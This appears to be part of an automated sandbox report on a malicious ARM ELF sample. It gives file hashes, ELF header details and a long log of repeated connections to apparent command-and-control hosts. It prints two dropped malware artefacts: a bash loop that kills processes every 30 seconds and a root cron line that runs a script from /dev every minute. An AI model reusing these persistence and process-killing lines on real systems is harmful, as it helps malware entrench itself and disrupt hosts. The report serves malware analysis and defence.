                                                                                                  MD5:A3FC64B86B20A7B2EAA9330E1064D1F1
                                                                                                  SHA1:3A6F294C550A578D5E337F67FD4D9C1984EEA885
                                                                                                  SHA-256:6029DD069BC913653EEC32E54FB005A80FB71EBB5F0A584C71E06AC08FBBECE6
                                                                                                  SHA-512:CE26F2C6ECEC049B7053008E323018EC8A709942A456464A1D423F80B92BCA410D9B0F661093EB732254E6690900AC9A15B6F62450F72E6511195AEE403C50B6
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: arm7.elf, Detection: malicious, Browse
                                                                                                  • Filename: oc_i486.elf, Detection: malicious, Browse
                                                                                                  • Filename: oc_x86_64.elf, Detection: malicious, Browse
                                                                                                  • Filename: oc_aarch64.elf, Detection: malicious, Browse
                                                                                                  • Filename: oc_mips.elf, Detection: malicious, Browse
                                                                                                  • Filename: oc_i686.elf, Detection: malicious, Browse
                                                                                                  • Filename: oc_arm7.elf, Detection: malicious, Browse
                                                                                                  • Filename: oc_mipsel.elf, Detection: malicious, Browse
                                                                                                  • Filename: oc_arm.elf, Detection: malicious, Browse
                                                                                                  Reputation:low
                                                                                                  Preview:#!/bin/bash..while true; do. cat /proc/$$/mountinfo | while read -r line; do. if [[ $line == *" /proc/"* ]]; then. if [[ $line != *"/boot"* ]]; then. PID=$(echo $line | grep -o "/proc/[0-9]*" | grep -o "[0-9]*"). PID=${PID#/proc/}. if [[ -n "$PID" ]]; then. echo "Found process the and kill pid: $PID". kill -9 $PID. fi. fi. fi. done. sleep 30.done.
                                                                                                  Process:/bin/sh
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):38
                                                                                                  Entropy (8bit):3.8463189626846375
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:3P11tKecVLE3Ov:ge7A
                                                                                                  MD5:67EC4A157E5B63970CFBB8CC55883AD7
                                                                                                  SHA1:5262B8C108DC3AEF69FCA6FFD959893DE852DC67
                                                                                                  SHA-256:0CB3CC915BB7492FF579F2B59237A5899088E5C5F238125AC9F0B5F73D2723E7
                                                                                                  SHA-512:EB6310992DC6E3AC1FCA2BCF26D82365494AA0ADBD80EE5EC6231B2418D1DAF6608F7820A560B4FBDA8C8885A59F8A82CA86AAA481F254D207926C1F6C5802B9
                                                                                                  Malicious:true
                                                                                                  Reputation:low
                                                                                                  Preview:* * * * * root /bin/bash /dev/ocmount.
                                                                                                  File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                                                  Entropy (8bit):5.692308003100198
                                                                                                  TrID:
                                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                  File name:arm5.elf
                                                                                                  File size:174'816 bytes
                                                                                                  MD5:cdac974b2ab6e445d718356feb3a2f73
                                                                                                  SHA1:5c447e7670af022c2bb7b8fb5b3f3aaa4851e0f0
                                                                                                  SHA256:01fd9fb670cd8dedeb43207a633baf548fcba872312aad3e40233a16a305cda7
                                                                                                  SHA512:2bbbc326eac4b866ce139dc1a1f989bb4547760289f20b0cdbb89cf218b94e05f5ff4a1794091b9463e464b3ff475e98178f1186fe8b8fe187c235ac7bda9e6b
                                                                                                  SSDEEP:3072:yjMf9tcOTPX8SJbruAf+6aWfzWG9Ei780eno:yjSteUvuAfraWfqGai7Dp
                                                                                                  TLSH:ED043B45FD909F22C5D712BBFB4E428D372A57A8D3EE3203D9256F24378A85B0E76241
                                                                                                  File Content Preview:.ELF...a..........(.........4...P.......4. ...(.....................0[..0[...............`...`...`...I..t...........Q.td..................................-...L."...............0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                                                  ELF header

                                                                                                  Class:ELF32
                                                                                                  Data:2's complement, little endian
                                                                                                  Version:1 (current)
                                                                                                  Machine:ARM
                                                                                                  Version Number:0x1
                                                                                                  Type:EXEC (Executable file)
                                                                                                  OS/ABI:ARM - ABI
                                                                                                  ABI Version:0
                                                                                                  Entry Point Address:0x8190
                                                                                                  Flags:0x2
                                                                                                  ELF Header Size:52
                                                                                                  Program Header Offset:52
                                                                                                  Program Header Size:32
                                                                                                  Number of Program Headers:3
                                                                                                  Section Header Offset:174416
                                                                                                  Section Header Size:40
                                                                                                  Number of Section Headers:10
                                                                                                  Header String Table Index:9
                                                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                  NULL0x00x00x00x00x0000
                                                                                                  .initPROGBITS0x80940x940x180x00x6AX004
                                                                                                  .textPROGBITS0x80b00xb00x2235c0x00x6AX0016
                                                                                                  .finiPROGBITS0x2a40c0x2240c0x140x00x6AX004
                                                                                                  .rodataPROGBITS0x2a4200x224200x37100x00x2A004
                                                                                                  .ctorsPROGBITS0x360000x260000xc0x00x3WA004
                                                                                                  .dtorsPROGBITS0x3600c0x2600c0x80x00x3WA004
                                                                                                  .dataPROGBITS0x360200x260200x48f00x00x3WA0032
                                                                                                  .bssNOBITS0x3a9100x2a9100x45640x00x3WA004
                                                                                                  .shstrtabSTRTAB0x00x2a9100x3e0x00x0001
                                                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                  LOAD0x00x80000x80000x25b300x25b306.10960x5R E0x8000.init .text .fini .rodata
                                                                                                  LOAD0x260000x360000x360000x49100x8e740.40160x6RW 0x8000.ctors .dtors .data .bss
                                                                                                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 6, 2024 15:51:48.057580948 CEST43928443192.168.2.2391.189.91.42
                                                                                                  Oct 6, 2024 15:51:53.688680887 CEST42836443192.168.2.2391.189.91.43
                                                                                                  Oct 6, 2024 15:51:54.712553024 CEST4251680192.168.2.23109.202.202.202
                                                                                                  Oct 6, 2024 15:52:09.814287901 CEST43928443192.168.2.2391.189.91.42
                                                                                                  Oct 6, 2024 15:52:17.489511967 CEST609648443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:17.494368076 CEST844360964156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:17.494653940 CEST609648443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:17.494654894 CEST609648443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:17.499641895 CEST844360964156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:17.499691010 CEST609648443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:17.504534960 CEST844360964156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:18.062341928 CEST844360964156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:18.062783957 CEST609648443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:18.067641020 CEST844360964156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:18.282944918 CEST609668443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:18.287859917 CEST844360966156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:18.287915945 CEST609668443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:18.291811943 CEST609668443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:18.296884060 CEST844360966156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:18.296941042 CEST609668443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:18.301881075 CEST844360966156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:18.891510963 CEST844360966156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:18.891774893 CEST609668443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:18.896573067 CEST844360966156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:19.533039093 CEST360002222192.168.2.23212.118.43.167
                                                                                                  Oct 6, 2024 15:52:19.537910938 CEST222236000212.118.43.167192.168.2.23
                                                                                                  Oct 6, 2024 15:52:19.537981033 CEST360002222192.168.2.23212.118.43.167
                                                                                                  Oct 6, 2024 15:52:19.540045023 CEST360002222192.168.2.23212.118.43.167
                                                                                                  Oct 6, 2024 15:52:19.540123940 CEST360002222192.168.2.23212.118.43.167
                                                                                                  Oct 6, 2024 15:52:19.544876099 CEST222236000212.118.43.167192.168.2.23
                                                                                                  Oct 6, 2024 15:52:19.586107969 CEST222236000212.118.43.167192.168.2.23
                                                                                                  Oct 6, 2024 15:52:20.052910089 CEST42836443192.168.2.2391.189.91.43
                                                                                                  Oct 6, 2024 15:52:24.148212910 CEST4251680192.168.2.23109.202.202.202
                                                                                                  Oct 6, 2024 15:52:40.916580915 CEST222236000212.118.43.167192.168.2.23
                                                                                                  Oct 6, 2024 15:52:40.916932106 CEST360002222192.168.2.23212.118.43.167
                                                                                                  Oct 6, 2024 15:52:44.105992079 CEST609708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:44.110932112 CEST844360970156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:44.110980034 CEST609708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:44.111008883 CEST609708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:44.115878105 CEST844360970156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:44.115919113 CEST609708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:44.120739937 CEST844360970156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:44.686969995 CEST844360970156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:44.687057972 CEST609708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:44.691845894 CEST844360970156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:45.031975985 CEST609728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.036936045 CEST844360972156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:45.036998987 CEST609728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.037026882 CEST609728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.041763067 CEST844360972156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:45.041809082 CEST609728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.046616077 CEST844360972156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:45.680964947 CEST844360972156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:45.681085110 CEST609728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.685945988 CEST844360972156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:45.724494934 CEST609748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.729331970 CEST844360974156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:45.729388952 CEST609748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.729429960 CEST609748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.734225988 CEST844360974156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:45.734283924 CEST609748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:45.739097118 CEST844360974156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:46.297805071 CEST844360974156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:46.297992945 CEST609748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:46.302911997 CEST844360974156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:46.717231035 CEST609768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:46.722165108 CEST844360976156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:46.722306967 CEST609768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:46.722393036 CEST609768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:46.727556944 CEST844360976156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:46.727704048 CEST609768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:46.732578993 CEST844360976156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:47.298046112 CEST844360976156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:47.298168898 CEST609768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:47.303045034 CEST844360976156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:47.357412100 CEST609788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:47.362366915 CEST844360978156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:47.362410069 CEST609788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:47.362448931 CEST609788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:47.367279053 CEST844360978156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:47.367321968 CEST609788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:47.372140884 CEST844360978156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:47.947103977 CEST844360978156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:47.947227001 CEST609788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:47.952272892 CEST844360978156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:48.949466944 CEST609808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:48.954497099 CEST844360980156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:48.954566956 CEST609808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:48.954596996 CEST609808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:48.959594011 CEST844360980156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:48.959647894 CEST609808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:48.964523077 CEST844360980156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:50.768368959 CEST43928443192.168.2.2391.189.91.42
                                                                                                  Oct 6, 2024 15:52:53.352844000 CEST609828443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:53.357700109 CEST844360982156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:53.357759953 CEST609828443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:53.357800007 CEST609828443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:53.567923069 CEST609828443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:53.677392960 CEST844360982156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:53.677403927 CEST844360982156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:54.265928030 CEST844360982156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:54.266030073 CEST609828443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:54.270878077 CEST844360982156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:55.267855883 CEST609848443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:55.272737026 CEST844360984156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:55.272814035 CEST609848443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:55.272850990 CEST609848443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:55.277820110 CEST844360984156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:55.277882099 CEST609848443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:55.282864094 CEST844360984156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:55.848870993 CEST844360984156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:55.848989964 CEST609848443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:55.854234934 CEST844360984156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:56.850006104 CEST609868443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:56.854876041 CEST844360986156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:56.854939938 CEST609868443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:56.854999065 CEST609868443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:56.859831095 CEST844360986156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:56.859874010 CEST609868443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:56.864658117 CEST844360986156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:57.439539909 CEST844360986156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:57.439655066 CEST609868443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:57.444499969 CEST844360986156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:58.453923941 CEST609888443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:58.458911896 CEST844360988156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:58.458992958 CEST609888443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:58.459017038 CEST609888443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:58.463956118 CEST844360988156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:58.463998079 CEST609888443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:58.468873024 CEST844360988156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:59.052243948 CEST844360988156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:52:59.052335978 CEST609888443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:52:59.057303905 CEST844360988156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:00.082984924 CEST609908443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:00.087872982 CEST844360990156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:00.087923050 CEST609908443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:00.087941885 CEST609908443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:00.092736959 CEST844360990156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:00.092782974 CEST609908443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:00.098691940 CEST844360990156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:00.696923018 CEST844360990156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:00.697051048 CEST609908443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:00.702145100 CEST844360990156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:01.715023041 CEST609928443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:01.719934940 CEST844360992156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:01.719997883 CEST609928443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:01.720045090 CEST609928443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:01.724847078 CEST844360992156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:01.724888086 CEST609928443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:01.729767084 CEST844360992156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:02.359114885 CEST844360992156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:02.359237909 CEST609928443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:02.364093065 CEST844360992156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:03.958734035 CEST609808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:03.963823080 CEST844360980156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:04.123284101 CEST844360980156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:04.123346090 CEST609808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:28.383225918 CEST609948443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:28.388329983 CEST844360994156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:28.388406038 CEST609948443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:28.388446093 CEST609948443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:28.393234968 CEST844360994156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:28.393279076 CEST609948443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:28.398102999 CEST844360994156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:28.997893095 CEST844360994156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:28.998102903 CEST609948443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:29.003371000 CEST844360994156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:30.058204889 CEST609968443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:30.063055992 CEST844360996156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:30.063127995 CEST609968443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:30.063168049 CEST609968443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:30.067991972 CEST844360996156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:30.068048954 CEST609968443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:30.072827101 CEST844360996156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:30.655528069 CEST844360996156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:30.655680895 CEST609968443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:30.660607100 CEST844360996156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:31.657073975 CEST609988443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:31.661895990 CEST844360998156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:31.661964893 CEST609988443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:31.662003994 CEST609988443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:31.666879892 CEST844360998156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:31.666937113 CEST609988443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:31.671705961 CEST844360998156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:32.236459017 CEST844360998156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:32.236639977 CEST609988443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:32.241671085 CEST844360998156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:33.256815910 CEST327688443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:33.261603117 CEST844332768156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:33.261665106 CEST327688443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:33.262554884 CEST327688443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:33.267416000 CEST844332768156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:33.267535925 CEST327688443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:33.272356033 CEST844332768156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:33.862096071 CEST844332768156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:33.862281084 CEST327688443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:33.867149115 CEST844332768156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:34.864186049 CEST327708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:34.869112968 CEST844332770156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:34.869210005 CEST327708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:34.869299889 CEST327708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:34.874113083 CEST844332770156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:34.874249935 CEST327708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:34.879029989 CEST844332770156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:35.454137087 CEST844332770156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:35.454282045 CEST327708443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:35.459054947 CEST844332770156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:36.485750914 CEST327728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:36.490631104 CEST844332772156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:36.490689993 CEST327728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:36.490715027 CEST327728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:36.495541096 CEST844332772156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:36.495589018 CEST327728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:36.500382900 CEST844332772156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:37.068892956 CEST844332772156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:37.069159985 CEST327728443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:37.074052095 CEST844332772156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:38.087466002 CEST327748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:38.092426062 CEST844332774156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:38.092479944 CEST327748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:38.092540026 CEST327748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:38.097578049 CEST844332774156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:38.097616911 CEST327748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:38.102540970 CEST844332774156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:38.665451050 CEST844332774156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:38.665569067 CEST327748443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:38.670577049 CEST844332774156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:39.667932987 CEST327768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:39.763545036 CEST844332776156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:39.763633013 CEST327768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:39.763720036 CEST327768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:39.768541098 CEST844332776156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:39.768598080 CEST327768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:39.773535967 CEST844332776156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:40.331259966 CEST844332776156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:40.331401110 CEST327768443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:40.336277962 CEST844332776156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:41.333479881 CEST327788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:41.338531017 CEST844332778156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:41.338603020 CEST327788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:41.338644981 CEST327788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:41.343624115 CEST844332778156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:41.344070911 CEST327788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:41.349075079 CEST844332778156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:41.942624092 CEST844332778156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:53:41.942748070 CEST327788443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:53:41.947634935 CEST844332778156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:54:07.961478949 CEST327808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:54:07.966561079 CEST844332780156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:54:07.966624022 CEST327808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:54:07.966653109 CEST327808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:54:07.971415043 CEST844332780156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:54:07.971457958 CEST327808443192.168.2.23156.238.224.214
